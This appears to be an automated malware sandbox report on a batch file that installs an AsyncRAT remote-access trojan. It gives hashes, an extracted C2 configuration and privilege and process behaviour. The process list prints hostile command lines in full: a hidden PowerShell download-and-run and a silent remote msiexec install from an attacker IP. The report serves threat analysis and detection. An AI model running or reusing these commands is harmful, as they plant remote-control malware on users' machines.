Analysis
max time kernel: 150s
max time network: 147s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 22-05-2024 19:30
Static task: static1
Behavioral task: behavioral1
Sample: frobf.bat
Resource: win7-20240221-en
General
Target: frobf.bat
Size: 17KB
MD5: 389078feb0d26c841b905168deaecd15
SHA1: e0013a66fad26afbbac701c3fbd6a0d85ddce3c9
SHA256: f21b7aec9770dc80d20ac5fd871b6b88b7ba4586c2ae56faf724a23ee64a6193
SHA512: ce51959c6d29112e575350013be45f87907edb9dc2c6bc3c8dc566e251a350bc361380202c34874aef71085f745dbf4e4ae4a760f457f49ff5e36f238785d238
SSDEEP: 192:oZYztAEqvAb5JqjbLoUfSY1PfcLCL6lh2uxHwNy/FDcTjNolW/uw6yfzyKe:oZY5AEqvA5JEoiJ1PfcL1PDwiMVvWKe
Malware Config
Extracted
  URL: http://103.179.189.111/porn.png
Extracted
  Family: asyncrat
  Version: 1.0.7
  Botnet: Default
  C2: 103.179.189.111:8848
  Mutex: DcRatMutex_qwqdanchun
  delay: 1
  install: false
  install_folder: %AppData%
Signatures
Async RAT payload (1 IoC)
  resource: C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe
  yara_rule: family_asyncrat
Blocklisted process makes network request (2 IoCs)
  flow 4, pid 2668, powershell.exe
  flow 6, pid 3052, msiexec.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
Executes dropped EXE (1 IoC)
  pid 1704, Client.exe
Loads dropped DLL (5 IoCs)
  pid 1808, MsiExec.exe (5 entries)
Modifies file permissions (1 TTP, 1 IoC)
Use of msiexec (install) with remote resource (1 IoC)
  pid 2520, msiexec.exe
Enumerates connected drives (3 TTPs, 23 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  File opened (read-only) by msiexec.exe: \??\W: \??\P: \??\Q: \??\R: \??\V: \??\T: \??\U: \??\Y: \??\A: \??\G: \??\M: \??\O: \??\S: \??\X: \??\Z: \??\E: \??\I: \??\L: \??\N: \??\B: \??\H: \??\J: \??\K:
Drops file in Windows directory (6 IoCs)
  File opened for modification C:\Windows\Logs\DPX\setuperr.log (EXPAND.EXE)
  File opened for modification C:\Windows\Installer\MSI4808.tmp (msiexec.exe)
  File created C:\Windows\Installer\f764eed.ipi (msiexec.exe)
  File opened for modification C:\Windows\Installer\ (msiexec.exe)
  File opened for modification C:\Windows\Installer\MSI4FA7.tmp (msiexec.exe)
  File opened for modification C:\Windows\Logs\DPX\setupact.log (EXPAND.EXE)
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  pid 2520, msiexec.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid 2668, powershell.exe (1 entry)
  pid 3052, msiexec.exe (2 entries)
  pid 1704, Client.exe (all remaining entries)
Suspicious use of AdjustPrivilegeToken (40 IoCs)
  Token: SeDebugPrivilege, pid 2668, powershell.exe
  Token: SeShutdownPrivilege, pid 2520, msiexec.exe
  Token: SeIncreaseQuotaPrivilege, pid 2520, msiexec.exe
  Token: SeRestorePrivilege, pid 3052, msiexec.exe
  Token: SeTakeOwnershipPrivilege, pid 3052, msiexec.exe
  Token: SeSecurityPrivilege, pid 3052, msiexec.exe
  Token: SeCreateTokenPrivilege, pid 2520, msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege, pid 2520, msiexec.exe
  Token: SeLockMemoryPrivilege, pid 2520, msiexec.exe
  Token: SeIncreaseQuotaPrivilege, pid 2520, msiexec.exe
  Token: SeMachineAccountPrivilege, pid 2520, msiexec.exe
  Token: SeTcbPrivilege, pid 2520, msiexec.exe
  Token: SeSecurityPrivilege, pid 2520, msiexec.exe
  Token: SeTakeOwnershipPrivilege, pid 2520, msiexec.exe
  Token: SeLoadDriverPrivilege, pid 2520, msiexec.exe
  Token: SeSystemProfilePrivilege, pid 2520, msiexec.exe
  Token: SeSystemtimePrivilege, pid 2520, msiexec.exe
  Token: SeProfSingleProcessPrivilege, pid 2520, msiexec.exe
  Token: SeIncBasePriorityPrivilege, pid 2520, msiexec.exe
  Token: SeCreatePagefilePrivilege, pid 2520, msiexec.exe
  Token: SeCreatePermanentPrivilege, pid 2520, msiexec.exe
  Token: SeBackupPrivilege, pid 2520, msiexec.exe
  Token: SeRestorePrivilege, pid 2520, msiexec.exe
  Token: SeShutdownPrivilege, pid 2520, msiexec.exe
  Token: SeDebugPrivilege, pid 2520, msiexec.exe
  Token: SeAuditPrivilege, pid 2520, msiexec.exe
  Token: SeSystemEnvironmentPrivilege, pid 2520, msiexec.exe
  Token: SeChangeNotifyPrivilege, pid 2520, msiexec.exe
  Token: SeRemoteShutdownPrivilege, pid 2520, msiexec.exe
  Token: SeUndockPrivilege, pid 2520, msiexec.exe
  Token: SeSyncAgentPrivilege, pid 2520, msiexec.exe
  Token: SeEnableDelegationPrivilege, pid 2520, msiexec.exe
  Token: SeManageVolumePrivilege, pid 2520, msiexec.exe
  Token: SeImpersonatePrivilege, pid 2520, msiexec.exe
  Token: SeCreateGlobalPrivilege, pid 2520, msiexec.exe
  Token: SeRestorePrivilege, pid 3052, msiexec.exe
  Token: SeTakeOwnershipPrivilege, pid 3052, msiexec.exe
  Token: SeRestorePrivilege, pid 3052, msiexec.exe
  Token: SeTakeOwnershipPrivilege, pid 3052, msiexec.exe
  Token: SeDebugPrivilege, pid 1704, Client.exe
Suspicious use of WriteProcessMemory (54 IoCs)
  source pid / process -> target pid / process (repeat count)
  1312 cmd.exe -> 1992 chcp.com (3)
  1312 cmd.exe -> 1264 cmd.exe (3)
  1312 cmd.exe -> 2736 find.exe (3)
  1312 cmd.exe -> 2944 find.exe (3)
  1312 cmd.exe -> 1548 findstr.exe (3)
  1312 cmd.exe -> 2964 findstr.exe (3)
  1312 cmd.exe -> 2084 findstr.exe (3)
  1312 cmd.exe -> 2940 findstr.exe (3)
  1312 cmd.exe -> 2576 cmd.exe (3)
  1312 cmd.exe -> 2668 powershell.exe (3)
  1312 cmd.exe -> 2520 msiexec.exe (5)
  3052 msiexec.exe -> 1808 MsiExec.exe (7)
  1808 MsiExec.exe -> 344 ICACLS.EXE (4)
  1808 MsiExec.exe -> 2136 EXPAND.EXE (4)
  1808 MsiExec.exe -> 1704 Client.exe (4)
Processes
C:\Windows\system32\cmd.exe
  command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\frobf.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\chcp.com
    command line: chcp.com 437
  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c type tmp
  C:\Windows\system32\find.exe
    command line: find
  C:\Windows\system32\find.exe
    command line: find
  C:\Windows\system32\findstr.exe
    command line: findstr /L /I set C:\Users\Admin\AppData\Local\Temp\frobf.bat
  C:\Windows\system32\findstr.exe
    command line: findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\frobf.bat
  C:\Windows\system32\findstr.exe
    command line: findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\frobf.bat
  C:\Windows\system32\findstr.exe
    command line: findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\frobf.bat
  C:\Windows\system32\cmd.exe
    command line: C:\Windows\system32\cmd.exe /c type tmp
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: powershell.exe -WindowStyle Hidden -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://103.179.189.111/porn.png', \"$env:TEMP\al.png\"); start \"$env:TEMP\al.png\"}"
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\msiexec.exe
    command line: msiexec /quiet /i http://103.179.189.111/Client.msi
    - Use of msiexec (install) with remote resource
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\msiexec.exe
  command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\syswow64\MsiExec.exe
    command line: C:\Windows\syswow64\MsiExec.exe -Embedding 24A0861BC118DF4972B652DC81AD17DB
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\ICACLS.EXE
      command line: "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
      - Modifies file permissions
    C:\Windows\SysWOW64\EXPAND.EXE
      command line: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
      - Drops file in Windows directory
    C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files.cab
  Filesize: 47KB
  MD5: 16ebf2cc73df381da5b897f52a78ee22
  SHA1: c2689939e1c957c30ef261f139057a973c618f47
  SHA256: b2f5fcf9b63c873170b0cf7680831251dcc38c703e42fb558bed2120bd15e156
  SHA512: cfb58afd9b6b6433dedc8e2364013845d8ca023025ac8a8fecd7930493abc80c5f4961ee279ea06d7658adb4e9f2893c9ece0af8b2ae278d1f99713255a3f683
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\files\Client.exe
  Filesize: 47KB
  MD5: c69f098974248c79def70daf8b16bb8b
  SHA1: 793c9cd72b635d731686db373b5136ff63cabc0a
  SHA256: 93a0782c15f0c0049c85a07d09742805398aa6491b0b5a31d25603dc233c8f7d
  SHA512: d4d29f682cd42a3b494563929ae33356a386f2e9383010fdac8e95ce4c3e77100979d9040faeeb419eaecd82cee66a0521f2d50ee140ac7e0d7b25e77e2ae945
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.ini
  Filesize: 414B
  MD5: 530d04e1cc099e920079dadd42fa9af5
  SHA1: be108fde55d06a979d885c63a5bcabce57993314
  SHA256: 940ffdb2812a97de68423289c528be1747d5d04ed2a064087b60bdb77420ab14
  SHA512: 81ed506a25ae6216995fbf02be4427ab2d6500987dd6537d8c92edf107586dad1b178ae13f56cc03a84af9de2927c21ab299d17a892fc34be3f37355ea532d95
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.ini
  Filesize: 1KB
  MD5: 21f69a6b8ea7d93f9284c77871d3c17a
  SHA1: 1a9c9b50fd66f38a729f4735ed6bc29192de5123
  SHA256: 0518b7d7bce80897db79a85816a7ea57fd86bdd6fa5ff5bf7ae388d1013d043d
  SHA512: 31d6f62447dcff0ae8e3505a2b387e7a54bcb74a21924becb2dc7eaa258e9173f790db821d3d80da60b0ea4569b870771b854b08efbd1ccb997eb5247ec6c13e
C:\Users\Admin\AppData\Local\Temp\MW-d3296eb3-1925-4686-8c27-8bf2d359c139\msiwrapper.ini
  Filesize: 1KB
  MD5: cd560b89dc1658c1cc55081ac680b107
  SHA1: dfb29e554cb8530409e0e56dab08ea80cb07cdd6
  SHA256: 5fff6ed1642a05967c6917df3cf2d5a1077e73e5f03403920b95f3cfae9d08d0
  SHA512: 18a8bc48f334b97de382ebe3cc81934dde06c855207fa66029556bb16d7860fc92f8caab6cbba630c03efc1872a09eb3607596069d856ec7b1ed67e1658176e9
C:\Users\Admin\AppData\Local\Temp\tmp
  Filesize: 14B
  MD5: ce585c6ba32ac17652d2345118536f9c
  SHA1: be0e41b3690c42e4c0cdb53d53fc544fb46b758d
  SHA256: 589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
  SHA512: d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
C:\Windows\Installer\MSI4808.tmp
  Filesize: 292KB
  MD5: 6bd9dac0f28211bda45fb0c569580e65
  SHA1: d2b53dbd29537d7844d17f60c3ca263740a7b8db
  SHA256: fecd40361bf0eccab0681d13c32136860ebf9b8d5cc96c4eda6a43af32abe079
  SHA512: c3f30f6bd2f2b60b65b3da0e96c1738dc859455cccb354b57d97ad8fe200bea71adf32b865903efac2bc2c8d833dd7d23956dfa7cf3dcefaec63ca47f6fd6ab1
C:\Windows\Installer\MSI4FA7.tmp
  Filesize: 208KB
  MD5: 0c8921bbcc37c6efd34faf44cf3b0cb5
  SHA1: dcfa71246157edcd09eecaf9d4c5e360b24b3e49
  SHA256: fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
  SHA512: ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108
memory/1704-85-0x00000000012F0000-0x0000000001302000-memory.dmp
  Filesize: 72KB
memory/2668-12-0x000000001BD20000-0x000000001BD30000-memory.dmp
  Filesize: 64KB
memory/2668-10-0x0000000002790000-0x0000000002798000-memory.dmp
  Filesize: 32KB
memory/2668-9-0x000000001B630000-0x000000001B912000-memory.dmp
  Filesize: 2.9MB
memory/2668-8-0x00000000027B0000-0x0000000002830000-memory.dmp
  Filesize: 512KB